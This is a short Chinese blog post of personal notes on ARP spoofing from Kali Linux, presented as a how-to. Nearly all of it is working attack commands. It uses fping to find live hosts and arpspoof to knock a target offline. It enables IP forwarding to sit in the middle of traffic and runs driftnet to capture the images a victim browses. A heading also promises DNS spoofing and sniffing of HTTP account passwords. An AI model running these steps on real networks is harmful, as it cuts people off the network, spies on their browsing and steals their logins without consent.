一次arp欺骗的笔记

环境:kali2.0

kali-linux-2018.2-i386.iso

工具:

arpspoof ARP断网工具

ettercap ARP欺骗工具

driftnet 图片劫持

实现ARP断网攻击:

ifconfig //获取网卡信息
fping -asg 192.168.1.1/24 //获取局域网存活主机
arpspoof -i <网卡> -t <目标ip> <目标网关>
例如 arpspoof -i eth0 -t 192.168.1.190 192.168.1.1
ARP欺骗,获取对方浏览的web图片

//开启路由转发
echo 1 >/proc/sys/net/ipv4/ip_forward
//返回1为开启,设置0为关闭
cat /proc/sys/net/ipv4/ip_forward
//注意,<>第二个参数是目标网关,第三个是目标ip
arpspoof -i <网卡> -t <目标网关> <目标ip>
//查看图片
driftnet -i eth0
DNS欺骗+流量嗅探http帐号密码

目标ip 192.168.1.149

网关 192.168.1.1

echo 1 >/proc/sys/net/ipv4/ip_forward //转发
cat /proc/sys/net/ipv4/ip_forward
arpspoof -i <你的网卡> -t <对方网关> <对方ip>
测试完后记得关闭转发,不然会发生整个网段dns数据大量冗余。

导致整个网络无法上网。

echo 0 >/proc/sys/net/ipv4/ip_forward
如果发生这种情况可以写个cmd文件,写入
ipconfig /release
ipconfig /renew
保存

双击运行即可恢复

posted @ 2020-12-27 12:38  Creator、创造者  阅读(115)  评论(0)    收藏  举报